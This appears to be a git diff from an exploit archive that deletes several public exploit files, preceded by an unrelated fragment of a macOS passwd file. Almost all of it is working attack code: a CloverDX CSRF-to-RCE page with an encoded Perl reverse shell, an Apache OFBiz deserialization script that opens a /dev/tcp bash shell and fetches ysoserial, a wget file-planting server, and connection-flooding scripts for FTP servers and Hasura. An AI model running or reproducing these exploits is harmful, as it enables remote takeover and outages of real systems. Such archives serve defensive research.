_gpsd:*:267:267:GPS Daemon:/var/db/gpsd:/usr/bin/false
_reportmemoryexception:*:269:269:ReportMemoryException:/var/empty:/usr/bin/false
_diskimagesiod:*:271:271:DiskImages IO Daemon:/var/db/diskimagesiod:/usr/bin/false
_logd:*:272:272:Log Daemon:/var/db/diagnostics:/usr/bin/false
_iconservices:*:276:276:Icon services:/var/empty:/usr/bin/false
_fud:*:278:278:Firmware Update Daemon:/var/db/fud:/usr/bin/false
_knowledgegraphd:*:279:279:Knowledge Graph Daemon:/var/db/knowledgegraphd:/usr/bin/false
_coreml:*:280:280:CoreML Services:/var/empty:/usr/bin/false

137
exploits/java/webapps/50166.py
View file

@ -1,137 +0,0 @@
# Exploit Title: CloverDX 5.9.0 - Cross-Site Request Forgery (CSRF) to Remote Code Execution (RCE)
# Date: 14.04.2021
# Exploit Author: niebardzo
# Vendor Homepage: https://www.cloverdx.com/
# Software Link: https://github.com/cloverdx/cloverdx-server-docker
# Version: 5.9.0, 5.8.1, 5.8.0, 5.7.0, 5.6.x, 5.5.x, 5.4.x
# Tested on: Docker image - https://github.com/cloverdx/cloverdx-server-docker
# CVE : CVE-2021-29995
# Replace the target, payload and port to host the exploitation server. Exploit requires, inbound connection to CloverDX
# Victim authenticated to CloverDX and the java to run the ViewStateCracker.java.
# Reference for cracking ViewState:
# https://jazzy.id.au/2010/09/20/cracking_random_number_generators_part_1.html
# https://blog.securityevaluators.com/cracking-javas-rng-for-csrf-ea9cacd231d2
#
import http.server
import socketserver
import requests
from urllib.parse import urlparse
from urllib.parse import parse_qs
from bs4 import BeautifulSoup
import subprocess
import sys
import json
class ExploitHandler(http.server.SimpleHTTPRequestHandler):
def do_GET(self):
self.send_response(200)
self.send_header("Content-Type", "text/html; charset=utf-8")
self.end_headers()
# replace with your own target
target = "http://localhost:8080"
query_comp = parse_qs(urlparse(self.path).query)
if "target" in query_comp:
target = query_comp["target"][0]
req = requests.get(target+"/clover/gui/login.jsf")
if req.status_code != 200:
sys.exit(-1)
# parse the reponse retrieve the ViewState
soup = BeautifulSoup(req.text, "html.parser")
cur_view_state = soup.find("input", {"name": "javax.faces.ViewState"})["value"]
# Use the ViewstateCracker.java to get new Viewstate.
new_view_state = subprocess.check_output(["java", "ViewstateCracker.java", cur_view_state])
new_view_state = new_view_state.decode("utf-8").strip()
print(new_view_state)
if new_view_state == "6927638971750518694:6717304323717288036":
html = ("<!DOCTYPE html><html><head></head><body><h1>Hello Clover Admin!</h1><br>"
+ "<script>window.setTimeout(function () { location.reload()}, 1500)</script></body></html>")
else:
html = ("<!DOCTYPE html><html><head>"
+ "<script>"
+ "function exec1(){document.getElementById('form1').submit(); setTimeout(exec2, 2000);}"
+ "function exec2(){document.getElementById('form2').submit(); setTimeout(exec3, 2000);}"
+ "function exec3(){document.getElementById('form3').submit(); setTimeout(exec4, 2000);}"
+ "function exec4(){document.getElementById('form4').submit();}"
+ "</script>"
+ "</head><body onload='exec1();'><h1>Hello Clover Admin! Please wait here, content is loading...</h1>"
+ "<script>history.pushState('','/');</script>"
+ "<form target='if1' id='form1' method='GET' action='{}/clover/gui/event-listeners' style='visibility: hidden;'>".format(target)
+ "<input type='submit' value='' style='visibility: hidden;'></form> "
+ "<form target='if2' id='form2' enctype='application/x-www-form-urlencoded' method='POST' action='{}/clover/gui/event-listeners' style='visibility: hidden;'>".format(target)
+ "<input type='hidden' value='true' name='javax.faces.partial.ajax'>"
+ "<input type='hidden' value='headerForm&#58;manualListenerItem' name='javax.faces.source'>"
+ "<input type='hidden' value='@all' name='javax.faces.partial.execute'>"
+ "<input type='hidden' value='allContent' name='javax.faces.partial.render'>"
+ "<input type='hidden' value='headerForm&#58;manualListenerItem' name='headerForm&#58;manualListenerItem'>"
+ "<input type='hidden' value='headerForm' name='headerForm'>"
+ "<input type='hidden' value='{}' name='javax.faces.ViewState'>".format(new_view_state.replace(":","&#58;"))
+ "<input type='submit' value='' style='visibility: hidden;'></form> "
+ "<form target='if3' id='form3' enctype='application/x-www-form-urlencoded' method='POST' action='{}/clover/gui/event-listeners' style='visibility: hidden;'>".format(target)
+ "<input type='hidden' value='true' name='javax.faces.partial.ajax'>"
+ "<input type='hidden' value='manualListeneForm&#58;taskType' name='javax.faces.source'>"
+ "<input type='hidden' value='manualListeneForm&#58;taskType' name='javax.faces.partial.execute'>"
+ "<input type='hidden' value='manualListeneForm&#58;taskFormFragment' name='javax.faces.partial.render'>"
+ "<input type='hidden' value='valueChange' name='javax.faces.behavior.event'>"
+ "<input type='hidden' value='change' name='javax.faces.partial.event'>"
+ "<input type='hidden' value='manualListeneForm' name='manualListeneForm'>"
+ "<input type='hidden' value='shell_command' name='manualListeneForm&#58;taskType_input'>"
+ "<input type='hidden' value='on' name='manualListeneForm&#58;saveRunRecord_input'>"
+ "<input type='hidden' value='true' name='manualListeneForm&#58;manualVariablesList_collapsed'>"
+ "<input type='hidden' value='{}' name='javax.faces.ViewState'>".format(new_view_state.replace(":","&#58;"))
+ "<input type='submit' value='' style='visibility: hidden;'></form> "
+ "<form target='if4' id='form4' enctype='application/x-www-form-urlencoded' method='POST' action='{}/clover/gui/event-listeners' style='visibility: hidden;'>".format(target)
+ "<input type='hidden' value='true' name='javax.faces.partial.ajax'>"
+ "<input type='hidden' value='manualListeneForm:execute_button' name='javax.faces.source'>"
+ "<input type='hidden' value='@all' name='javax.faces.partial.execute'>"
+ "<input type='hidden' value='rightContent' name='javax.faces.partial.render'>"
+ "<input type='hidden' value='manualListeneForm:execute_button' name='manualListeneForm&#58;execute_button'>"
+ "<input type='hidden' value='manualListeneForm' name='manualListeneForm'>"
+ "<input type='hidden' value='' name='manualListeneForm&#58;properties&#58;propertiesTable&#58;propName'>"
+ "<input type='hidden' value='' name='manualListeneForm&#58;properties&#58;propertiesTable&#58;propValue'>"
+ "<input type='hidden' value='' name='manualListeneForm&#58;taskType_focus'>"
+ "<input type='hidden' value='shell_command' name='manualListeneForm&#58;taskType_input'>"
#
# Below is the HTML encoded perl reverse, replace with your own payload, remember to HTML encode.
#
+ "<input type='hidden' value='&#x70;&#x65;&#x72;&#x6c;&#x20;&#x2d;&#x65;&#x20;&#x27;&#x75;&#x73;&#x65;&#x20;&#x53;&#x6f;&#x63;&#x6b;&#x65;&#x74;&#x3b;&#x24;&#x69;&#x3d;"&#x31;&#x39;&#x32;&#x2e;&#x31;&#x36;&#x38;&#x2e;&#x36;&#x35;&#x2e;&#x32;"&#x3b;&#x24;&#x70;&#x3d;&#x34;&#x34;&#x34;&#x34;&#x3b;&#x73;&#x6f;&#x63;&#x6b;&#x65;&#x74;&#x28;&#x53;&#x2c;&#x50;&#x46;&#x5f;&#x49;&#x4e;&#x45;&#x54;&#x2c;&#x53;&#x4f;&#x43;&#x4b;&#x5f;&#x53;&#x54;&#x52;&#x45;&#x41;&#x4d;&#x2c;&#x67;&#x65;&#x74;&#x70;&#x72;&#x6f;&#x74;&#x6f;&#x62;&#x79;&#x6e;&#x61;&#x6d;&#x65;&#x28;"&#x74;&#x63;&#x70;"&#x29;&#x29;&#x3b;&#x69;&#x66;&#x28;&#x63;&#x6f;&#x6e;&#x6e;&#x65;&#x63;&#x74;&#x28;&#x53;&#x2c;&#x73;&#x6f;&#x63;&#x6b;&#x61;&#x64;&#x64;&#x72;&#x5f;&#x69;&#x6e;&#x28;&#x24;&#x70;&#x2c;&#x69;&#x6e;&#x65;&#x74;&#x5f;&#x61;&#x74;&#x6f;&#x6e;&#x28;&#x24;&#x69;&#x29;&#x29;&#x29;&#x29;&#x7b;&#x6f;&#x70;&#x65;&#x6e;&#x28;&#x53;&#x54;&#x44;&#x49;&#x4e;&#x2c;">&&#x53;"&#x29;&#x3b;&#x6f;&#x70;&#x65;&#x6e;&#x28;&#x53;&#x54;&#x44;&#x4f;&#x55;&#x54;&#x2c;">&&#x53;"&#x29;&#x3b;&#x6f;&#x70;&#x65;&#x6e;&#x28;&#x53;&#x54;&#x44;&#x45;&#x52;&#x52;&#x2c;">&&#x53;"&#x29;&#x3b;&#x65;&#x78;&#x65;&#x63;&#x28;"&#x2f;&#x62;&#x69;&#x6e;&#x2f;&#x73;&#x68;&#x20;&#x2d;&#x69;"&#x29;&#x3b;&#x7d;&#x3b;&#x27;' name='manualListeneForm&#58;shellEditor'>"
+ "<input type='hidden' value='' name='manualListeneForm&#58;workingDirectory'>"
+ "<input type='hidden' value='10000' name='manualListeneForm&#58;timeout'>"
+ "<input type='hidden' value='true' name='manualListeneForm&#58;scriptVariablesList_collapsed'>"
+ "<input type='hidden' value='{}' name='javax.faces.ViewState'>".format(new_view_state.replace(":","&#58;"))
+ "<input type='submit' value='' style='visibility: hidden;'></form> "
+ "<iframe name='if1' style='display: hidden;' width='0' height='0' frameborder='0' ></iframe>"
+ "<iframe name='if2' style='display: hidden;' width='0' height='0' frameborder='0'></iframe>"
+ "<iframe name='if3' style='display: hidden;' width='0' height='0' frameborder='0'></iframe>"
+ "<iframe name='if4' style='display: hidden;' width='0' height='0' frameborder='0'></iframe>"
+ "</body></html>")
self.wfile.write(bytes(html,"utf-8"))
base64_enc_viewstatecracker = "CnB1YmxpYyBjbGFzcyBWaWV3c3RhdGVDcmFja2VyIHsKICAvKiBTVEFSVCBQQVJUIDEgKi8KICBwdWJsaWMgc3RhdGljIGZpbmFsIGludCBvZmZzZXQgICAgID0gMzI7CiAgcHVibGljIHN0YXRpYyBmaW5hbCBpbnQgaXRlcmF0aW9ucyA9IDY1NTM2OwoKICBwdWJsaWMgc3RhdGljIGZpbmFsIFN0cmluZyBnZW5lcmF0ZU5ld1ZpZXdzdGF0ZShmaW5hbCBsb25nIGlkSW5Mb2dpY2FsTWFwLCBmaW5hbCBsb25nIGlkSW5BY3R1YWxNYXApIHsKICAgIGZpbmFsIGxvbmcgZmlyc3QzMkJpdHNPZklkSW5Mb2dpY2FsTWFwICA9IGlkSW5Mb2dpY2FsTWFwID4+PiBvZmZzZXQ7CiAgICBmaW5hbCBsb25nIHNlY29uZDMyQml0c09mSWRJbkxvZ2ljYWxNYXAgPSAoKGlkSW5Mb2dpY2FsTWFwIDw8IG9mZnNldCkgPj4+IG9mZnNldCk7CiAgICBmaW5hbCBsb25nIGZpcnN0MzJCaXRzT2ZJZEluQWN0dWFsTWFwICAgPSBpZEluQWN0dWFsTWFwID4+PiBvZmZzZXQ7ICAgICAgICAgLy8gVmVyaWZpY2F0aW9uCiAgICBmaW5hbCBsb25nIHNlY29uZDMyQml0c09mSWRJbkFjdHVhbE1hcCAgPSAoKGlkSW5BY3R1YWxNYXAgPDwgb2Zmc2V0KSA+Pj4gb2Zmc2V0KTsgLy8gVmVyaWZpY2F0aW9uCiAgICAvKiBFTkQgUEFSVCAxICovCgogICAgLyogU1RBUlQgUEFSVCAyICovCiAgICBsb25nIHRoZV9zZWVkID0gMUw7CgogICAgZm9yIChpbnQgaSA9IDA7IGkgPCBpdGVyYXRpb25zOyBpKyspIHsKICAgICAgbG9uZyB0bXBfc2VlZCA9ICgoZmlyc3QzMkJpdHNPZklkSW5Mb2dpY2FsTWFwIDw8IDE2KSArIGkpOwogICAgICBpZiAoKChpbnQpKCgodG1wX3NlZWQgKiAweDVERUVDRTY2REwgKyAweEJsKSAmICgoMUwgPDwgNDgpIC0gMSkpID4+PiAxNikpID09IHNlY29uZDMyQml0c09mSWRJbkxvZ2ljYWxNYXApIHsKICAgICAgICAvL1N5c3RlbS5vdXQucHJpbnRsbigiU2VlZCBmb3VuZDogIiArIHRtcF9zZWVkKTsKICAgICAgICB0aGVfc2VlZCA9IHRtcF9zZWVkOwogICAgICAgIGJyZWFrOwogICAgICB9CiAgICB9CiAgICAvKiBFTkQgUEFSVCAyICovCgogICAgLyogU1RBUlQgUEFSVCAzICovCiAgICAvLyBHZW5lcmF0ZSBudW1iZXIgMiAoU2Vjb25kIE51bWJlciBvZiBpZEluTG9naWNhbE1hcCkKICAgIHRoZV9zZWVkID0gKHRoZV9zZWVkICogMHg1REVFQ0U2NkRMICsgMHhCTCkgJiAoKDFMIDw8IDQ4KSAtIDEpOwoKICAgIC8vQ2FsY3VsYXRlIHRoZSB2YWx1ZSBvZiBpZEluQWN0dWFsTWFwCiAgICB0aGVfc2VlZCA9ICh0aGVfc2VlZCAqIDB4NURFRUNFNjZETCArIDB4QkwpICYgKCgxTCA8PCA0OCkgLSAxKTsKICAgIHRoZV9zZWVkID0gKHRoZV9zZWVkICogMHg1REVFQ0U2NkRMICsgMHhCTCkgJiAoKDFMIDw8IDQ4KSAtIDEpOwogICAgLyogRU5EIFBBUlQgMyovCgogICAgLyogU1RBUlQgUEFSVCA0Ki8KICAgIC8qIENhbGN1bGF0ZSBhIG5ldyBpZEluTG9naWNhbE1hcCAqLwoKICAgIC8vIEdlbmVyYXRlIHRoZSBmaXJzdCBoYWxmIG9mIHRoZSBmaXJzdCBMb25nCiAgICB0aGVfc2VlZCA9ICh0aGVfc2VlZCAqIDB4NURFRUNFNjZETCArIDB4QkwpICYgKCgxTCA8PCA0OCkgLSAxKTsKICAgIGludCBudW1iZXJfNSA9ICgoaW50KSh0aGVfc2VlZCA+Pj4gMTYpKTsKCiAgICAvLyBHZW5lcmF0ZSB0aGUgc2Vjb25kIGhhbGYgb2YgdGhlIGZpcnN0IExvbmcKICAgIHRoZV9zZWVkID0gKHRoZV9zZWVkICogMHg1REVFQ0U2NkRMICsgMHhCTCkgJiAoKDFMIDw8IDQ4KSAtIDEpOwogICAgaW50IG51bWJlcl82ID0gKChpbnQpKHRoZV9zZWVkID4+PiAxNikpOwoKICAgIC8vSGVyZSBpcyB0aGUgbmV3IGlkSW5Mb2dpY2FsTWFwCiAgICBsb25nIG5ld19sb25nXzEgPSAoKChsb25nKW51bWJlcl81IDw8IDMyKSArIG51bWJlcl82KTsKCgogICAgLyogQ2FsY3VsYXRlIGEgbmV3IGlkSW5BY3R1YWxNYXAgKi8KCiAgICAvLyBHZW5lcmF0ZSB0aGUgZmlyc3QgaGFsZiBvZiB0aGUgc2Vjb25kIExvbmcKICAgIHRoZV9zZWVkID0gKHRoZV9zZWVkICogMHg1REVFQ0U2NkRMICsgMHhCTCkgJiAoKDFMIDw8IDQ4KSAtIDEpOwogICAgaW50IG51bWJlcl83ID0gKChpbnQpKHRoZV9zZWVkID4+PiAxNikpOwoKICAgIC8vIEdlbmVyYXRlIHRoZSBzZWNvbmQgaGFsZiBvZiB0aGUgc2Vjb25kIExvbmcKICAgIHRoZV9zZWVkID0gKHRoZV9zZWVkICogMHg1REVFQ0U2NkRMICsgMHhCTCkgJiAoKDFMIDw8IDQ4KSAtIDEpOwogICAgaW50IG51bWJlcl84ID0gKChpbnQpKHRoZV9zZWVkID4+PiAxNikpOwoKICAgIC8vCiAgICBsb25nIG5ld19sb25nXzIgPSAoKChsb25nKW51bWJlcl83IDw8IDMyKSArIG51bWJlcl84KTsKCiAgICByZXR1cm4gbmV3X2xvbmdfMSArICI6IiArIG5ld19sb25nXzI7CiAgICAvKkVORCBQQVJUNCovCiAgfQogcHVibGljIHN0YXRpYyB2b2lkIG1haW4gKFN0cmluZyBhcmdzW10pIHsKCVN0cmluZyB0b2tlbiA9IGFyZ3NbMF07CglTdHJpbmdbXSBsb25ncyA9IHRva2VuLnNwbGl0KCI6Iik7Cglsb25nIGxvbmcxID0gTG9uZy5wYXJzZUxvbmcobG9uZ3NbMF0pOwoJbG9uZyBsb25nMiA9IExvbmcucGFyc2VMb25nKGxvbmdzWzFdKTsKCVN0cmluZyBuZXdUb2tlbiA9IGdlbmVyYXRlTmV3Vmlld3N0YXRlKGxvbmcxLGxvbmcyKTsKCVN5c3RlbS5vdXQucHJpbnRsbihuZXdUb2tlbik7Cgp9Cgp9Cg=="
#
# This drops ViewstateCracker.java from above, ref: https://blog.securityevaluators.com/cracking-javas-rng-for-csrf-ea9cacd231d2
#
with open("ViewstateCracker.java","w") as f:
f.write(b64decode(bytes(base64_enc_viewstatecracker, 'utf-8')).decode('utf-8'))
exploit_handler = ExploitHandler
PORT = 6010
exploit_server = socketserver.TCPServer(("", PORT), exploit_handler)
exploit_server.serve_forever()

78
exploits/java/webapps/50178.sh
View file

@ -1,78 +0,0 @@
# Exploit Title: ApacheOfBiz 17.12.01 - Remote Command Execution (RCE) via Unsafe Deserialization of XMLRPC arguments
# Date: 2021-08-04
# Exploit Author: Álvaro Muñoz, Adrián Díaz (s4dbrd)
# Vendor Homepage: https://ofbiz.apache.org/index.html
# Software Link: https://archive.apache.org/dist/ofbiz/apache-ofbiz-17.12.01.zip
# Version: 17.12.01
# Tested on: Linux
# CVE : CVE-2020-9496
# Reference: https://securitylab.github.com/advisories/GHSL-2020-069-apache_ofbiz/
# Description: This CVE was discovered by Alvaro Muñoz, but I have created this POC to automate the process and the necessary requests to successfully exploit it and get RCE.
#!/usr/bin/env bash
# Because the 2 xmlrpc related requets in webtools (xmlrpc and ping) are not using authentication they are vulnerable to unsafe deserialization.
# This issue was reported to the security team by Alvaro Munoz pwntester@github.com from the GitHub Security Lab team.
#
# This vulnerability exists due to Java serialization issues when processing requests sent to /webtools/control/xmlrpc.
# A remote unauthenticated attacker can exploit this vulnerability by sending a crafted request. Successful exploitation would result in arbitrary code execution.
#
# Steps to exploit:
#
# Step 1: Host HTTP Service with python3 (sudo python3 -m http.server 80)
# Step 2: Start nc listener (Recommended 8001).
# Step 3: Run the exploit.
url='https://127.0.0.1' # CHANGE THIS
port=8443 # CHANGE THIS
function helpPanel(){
echo -e "\nUsage:"
echo -e "\t[-i] Attacker's IP"
echo -e "\t[-p] Attacker's Port"
echo -e "\t[-h] Show help pannel"
exit 1
}
function ctrl_c(){
echo -e "\n\n[!] Exiting...\n"
exit 1
}
# Ctrl + C
trap ctrl_c INT
function webRequest(){
echo -e "\n[*] Creating a shell file with bash\n"
echo -e "#!/bin/bash\n/bin/bash -i >& /dev/tcp/$ip/$ncport 0>&1" > shell.sh
echo -e "[*] Downloading YsoSerial JAR File\n"
wget -q https://jitpack.io/com/github/frohoff/ysoserial/master-d367e379d9-1/ysoserial-master-d367e379d9-1.jar
echo -e "[*] Generating a JAR payload\n"
payload=$(java -jar ysoserial-master-d367e379d9-1.jar CommonsBeanutils1 "wget $ip/shell.sh -O /tmp/shell.sh" | base64 | tr -d "\n")
echo -e "[*] Sending malicious shell to server...\n" && sleep 0.5
curl -s $url:$port/webtools/control/xmlrpc -X POST -d "<?xml version='1.0'?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value><struct><member><name>test</name><value><serializable xmlns='http://ws.apache.org/xmlrpc/namespaces/extensions'>$payload</serializable></value></member></struct></value></param></params></methodCall>" -k -H 'Content-Type:application/xml' &>/dev/null
echo -e "[*] Generating a second JAR payload"
payload2=$(java -jar ysoserial-master-d367e379d9-1.jar CommonsBeanutils1 "bash /tmp/shell.sh" | base64 | tr -d "\n")
echo -e "\n[*] Executing the payload in the server...\n" && sleep 0.5
curl -s $url:$port/webtools/control/xmlrpc -X POST -d "<?xml version='1.0'?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value><struct><member><name>test</name><value><serializable xmlns='http://ws.apache.org/xmlrpc/namespaces/extensions'>$payload2</serializable></value></member></struct></value></param></params></methodCall>" -k -H 'Content-Type:application/xml' &>/dev/null
echo -e "\n[*]Deleting Files..."
rm ysoserial-master-d367e379d9-1.jar && rm shell.sh
}
declare -i parameter_enable=0; while getopts ":i:p:h:" arg; do
case $arg in
i) ip=$OPTARG; let parameter_enable+=1;;
p) ncport=$OPTARG; let parameter_enable+=1;;
h) helpPanel;;
esac
done
if [ $parameter_enable -ne 2 ]; then
helpPanel
else
webRequest
fi

116
exploits/linux/local/50236.py
View file

File diff suppressed because one or more lines are too long

54
exploits/linux/remote/49815.py
View file

@ -1,54 +0,0 @@
# Exploit Title: GNU Wget < 1.18 - Arbitrary File Upload / Remote Code Execution (2)
# Original Exploit Author: Dawid Golunski
# Exploit Author: liewehacksie
# Version: GNU Wget < 1.18
# CVE: CVE-2016-4971
import http.server
import socketserver
import socket
import sys
class wgetExploit(http.server.SimpleHTTPRequestHandler):
def do_GET(self):
# This takes care of sending .wgetrc/.bash_profile/$file
print("We have a volunteer requesting " + self.path + " by GET :)\n")
if "Wget" not in self.headers.get('User-Agent'):
print("But it's not a Wget :( \n")
self.send_response(200)
self.end_headers()
self.wfile.write("Nothing to see here...")
return
self.send_response(301)
print("Uploading " + str(FILE) + "via ftp redirect vuln. It should land in /home/ \n")
new_path = 'ftp://anonymous@{}:{}/{}'.format(FTP_HOST, FTP_PORT, FILE)
print("Sending redirect to %s \n"%(new_path))
self.send_header('Location', new_path)
self.end_headers()
HTTP_LISTEN_IP = '192.168.72.2'
HTTP_LISTEN_PORT = 80
FTP_HOST = '192.168.72.4'
FTP_PORT = 2121
FILE = '.bash_profile'
handler = socketserver.TCPServer((HTTP_LISTEN_IP, HTTP_LISTEN_PORT), wgetExploit)
print("Ready? Is your FTP server running?")
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
result = sock.connect_ex((FTP_HOST, FTP_PORT))
if result == 0:
print("FTP found open on %s:%s. Let's go then\n" % (FTP_HOST, FTP_PORT))
else:
print("FTP is down :( Exiting.")
exit(1)
print("Serving wget exploit on port %s...\n\n" % HTTP_LISTEN_PORT)
handler.serve_forever()

36
exploits/multiple/dos/49489.html
View file

@ -1,36 +0,0 @@
# Exploit Title: jQuery UI 1.12.1 - Denial of Service (DoS)
# Date: 20 Jan, 2021
# Exploit Author: Rafael Cintra Lopes
# Vendor Homepage: https://jqueryui.com/
# Software Link: https://jqueryui.com/download/
# Version: <= 1.12.1
# CVE : CVE-2020-28488
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>DoS - jQuery UI 1.12.1</title>
</head>
<body>
<h2>DoS - jQuery UI 1.12.1</h2>
<div>
<button onclick="exploit()">Exploit</button>
</div>
<p>PoC by Rafael Cintra Lopes</p>
<script src="https://code.jquery.com/jquery-3.5.1.min.js" integrity="sha256-9/aliU8dGd2tb6OSsuzixeV4y/faTqgFtohetphbbj0=" crossorigin="anonymous"></script>
<script src="https://code.jquery.com/ui/1.12.1/jquery-ui.min.js" integrity="sha256-VazP97ZCwtekAsvgPBSUwPFKdrwD3unUfSGVYrahUqU=" crossorigin="anonymous"></script>
<script>
function exploit(){
for (var i = 0; i < 10; i++) {
$("div").dialog({title:'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'});
}
}
</script>
</body>
</html>

101
exploits/multiple/dos/49697.py
View file

@ -1,101 +0,0 @@
# Exploit Title: ProFTPD 1.3.7a - Remote Denial of Service
# Date: 22/03/2021
# Exploit Author: xynmaps
# Vendor Homepage: http://www.proftpd.org/
# Software Link: https://github.com/proftpd/proftpd
# Version: 1.3.7a
# Tested on: Parrot Security OS 5.9.0
#-------------------------------#
#encoding=utf8
#__author__ = XYN/Dump/NSKB3
#ProFTPD Denial of Service exploit by XYN/Dump/NSKB3.
"""
ProFTPD only lets a certain amount of connections to be made to the server, so, by repeatedly making new connections to the server,
you can block other legitimite users from making a connection to the server, if the the connections/ip isn't limited.
(if it's limited, just run this script from different proxies using proxychains, and it will work)
"""
import socket
import sys
import threading
import subprocess
import time
banner = """
._________________.
| ProFTPD |
| D o S |
|_________________|
|By XYN/DUMP/NSKB3|
|_|_____________|_|
|_|_|_|_____|_|_|_|
|_|_|_|_|_|_|_|_|_|
"""
usage = "{} <TARGET> <PORT(DEFAULT:21> <MAX_CONNS(DEFAULT:50)>".format(sys.argv[0])
def test(t,p):
s = socket.socket()
s.settimeout(10)
try:
s.connect((t, p))
response = s.recv(65535)
s.close()
return 0
except socket.error:
print("Port {} is not open, please specify a port that is open.".format(p))
sys.exit()
def attack(targ, po, id):
try:
subprocess.Popen("ftp {0} {1}".format(targ, po), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
#print("Worker {} running".format(id))
except OSError: pass
def main():
global target, port, start
print banner
try:
target = sys.argv[1]
except:
print usage
sys.exit()
try:
port = int(sys.argv[2])
except:
port = 21
try:
conns = int(sys.argv[3])
except:
conns = 50
print("[!] Testing if {0}:{1} is open".format(target, port))
test(target, port)
print("[+] Port {} open, starting attack...".format(port))
time.sleep(2)
print("[+] Attack started on {0}:{1}!".format(target, port))
def loop(target, port, conns):
global start
threading.Thread(target=timer).start()
while 1:
for i in range(1, conns + 3):
t = threading.Thread(target=attack, args=(target,port,i,))
t.start()
if i > conns + 2:
t.join()
break
loop()
t = threading.Thread(target=loop, args=(target, port, conns,))
t.start()
def timer():
start = time.time()
while 1:
if start < time.time() + float(900): pass
else:
subprocess.Popen("pkill ftp", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
t = threading.Thread(target=loop, args=(target, port,))
t.start()
break
main()

101
exploits/multiple/dos/49773.py
View file

@ -1,101 +0,0 @@
# Exploit Title: glFTPd 2.11a - Remote Denial of Service
# Date: 15/05/2021
# Exploit Author: xynmaps
# Vendor Homepage: https://glftpd.io/
# Software Link: https://glftpd.io/files/glftpd-LNX-2.11a_1.1.1k_x64.tgz
# Version: 2.11a
# Tested on: Parrot Security OS 5.9.0
#-------------------------------#
#encoding=utf8
#__author__ = XYN/Dump/NSKB3
#glFTPd Denial of Service exploit by XYN/Dump/NSKB3.
"""
glFTPd only lets a certain amount of connections to be made to the server, so, by repeatedly making new connections to the server,
you can block other legitimite users from making a connection to the server, if the the connections/ip isn't limited.
(if it's limited, just run this script from different proxies using proxychains, and it will work)
"""
import socket
import sys
import threading
import subprocess
import time
banner = """
._________________.
| glFTPd |
| D o S |
|_________________|
|By XYN/DUMP/NSKB3|
|_|_____________|_|
|_|_|_|_____|_|_|_|
|_|_|_|_|_|_|_|_|_|
"""
usage = "{} <TARGET> <PORT(DEFAULT:21> <MAX_CONNS(DEFAULT:50)>".format(sys.argv[0])
def test(t,p):
s = socket.socket()
s.settimeout(10)
try:
s.connect((t, p))
response = s.recv(65535)
s.close()
return 0
except socket.error:
print("Port {} is not open, please specify a port that is open.".format(p))
sys.exit()
def attack(targ, po, id):
try:
subprocess.Popen("ftp {0} {1}".format(targ, po), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
#print("Worker {} running".format(id))
except OSError: pass
def main():
global target, port, start
print banner
try:
target = sys.argv[1]
except:
print usage
sys.exit()
try:
port = int(sys.argv[2])
except:
port = 21
try:
conns = int(sys.argv[3])
except:
conns = 50
print("[!] Testing if {0}:{1} is open".format(target, port))
test(target, port)
print("[+] Port {} open, starting attack...".format(port))
time.sleep(2)
print("[+] Attack started on {0}:{1}!".format(target, port))
def loop(target, port, conns):
global start
threading.Thread(target=timer).start()
while 1:
for i in range(1, conns + 3):
t = threading.Thread(target=attack, args=(target,port,i,))
t.start()
if i > conns + 2:
t.join()
break
loop()
t = threading.Thread(target=loop, args=(target, port, conns,))
t.start()
def timer():
start = time.time()
while 1:
if start < time.time() + float(900): pass
else:
subprocess.Popen("pkill ftp", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
t = threading.Thread(target=loop, args=(target, port,))
t.start()
break
main()

50
exploits/multiple/dos/49789.py
View file

@ -1,50 +0,0 @@
# Exploit Title: Hasura GraphQL 1.3.3 - Denial of Service
# Software: Hasura GraphQL
# Software Link: https://github.com/hasura/graphql-engine
# Version: 1.3.3
# Author: Dolev Farhi
# Date: 4/19/2021
# Tested on: Ubuntu
import sys
import requests
import threading
HASURA_SCHEME = 'http'
HASURA_HOST = '192.168.1.1'
HASURA_PORT = 80
THREADS = 300
def create_table():
data = {"type":"bulk","args":[{"type":"run_sql","args":{"sql":"CREATE TABLE \"public\".\"test_db\"(\"test\" text NOT NULL, PRIMARY KEY (\"test\") );","cascade":False,"read_only":False}},{"type":"add_existing_table_or_view","args":{"name":"test_db","schema":"public"}}]}
endpoint = '{}://{}:{}/v1/query'.format(HASURA_SCHEME, HASURA_HOST, HASURA_PORT)
r = requests.post(endpoint, json=data)
return r
def insert_row():
bomb = 'A' * 100000
data = {"type":"insert","args":{"table":{"name":"test_db","schema":"public"},"objects":[{"test":bomb}],"returning":[]}}
endpoint = '{}://{}:{}/v1/query'.format(HASURA_SCHEME, HASURA_HOST, HASURA_PORT)
r = requests.post(endpoint, json=data)
return r
def DoS():
dups = 'test \n ' * 1000000
data = {'query': 'query { test_db { ' + dups + '} }'}
endpoint = '{}://{}:{}/v1/graphql'.format(HASURA_SCHEME, HASURA_HOST, HASURA_PORT)
r = requests.post(endpoint, json=data)
return r
if not create_table().ok:
print('something went wrong, could not create table.')
sys.exit(1)
if not insert_row().ok:
print('something went wrong, could not insert row')
sys.exit(1)
while True:
for _ in range(THREADS):
print('Starting')
t = threading.Thread(target=DoS, args=())
t.start()

101
exploits/multiple/remote/49719.py
View file

@ -1,101 +0,0 @@
# Exploit Title: vsftpd 3.0.3 - Remote Denial of Service
# Date: 22-03-2021
# Exploit Author: xynmaps
# Vendor Homepage: https://security.appspot.com/vsftpd.html
# Software Link: https://security.appspot.com/downloads/vsftpd-3.0.3.tar.gz
# Version: 3.0.3
# Tested on: Parrot Security OS 5.9.0
#-------------------------------#
#encoding=utf8
#__author__ = XYN/Dump/NSKB3
#VSFTPD Denial of Service exploit by XYN/Dump/NSKB3.
"""
VSFTPD only lets a certain amount of connections to be made to the server, so, by repeatedly making new connections to the server,
you can block other legitimite users from making a connection to the server, if the the connections/ip isn't limited.
(if it's limited, just run this script from different proxies using proxychains, and it will work)
"""
import socket
import sys
import threading
import subprocess
import time
banner = """
._________________.
| VS-FTPD |
| D o S |
|_________________|
